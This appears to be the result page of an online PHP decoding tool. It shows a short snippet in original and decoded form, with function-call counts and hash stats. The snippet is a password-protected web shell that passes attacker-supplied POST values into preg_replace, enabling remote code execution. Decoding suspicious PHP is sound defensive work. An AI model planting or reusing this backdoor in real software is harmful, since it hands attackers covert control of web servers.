Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (md5($_POST['p']) == 'd4c4d7b9ed4df3c4e66baab1d145a274') { preg_replace($_P..
Decoded Output download
<?php
if (md5($_POST['p']) == 'd4c4d7b9ed4df3c4e66baab1d145a274') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
?>
Did this file decode correctly?
Original Code
<?php
if (md5($_POST['p']) == 'd4c4d7b9ed4df3c4e66baab1d145a274') {
preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);
}
Function Calls
| md5 | 1 |
| preg_replace | 1 |
Stats
| MD5 | b943ab913eaea45146c2b11bbe74c77d |
| Eval Count | 0 |
| Decode Time | 114 ms |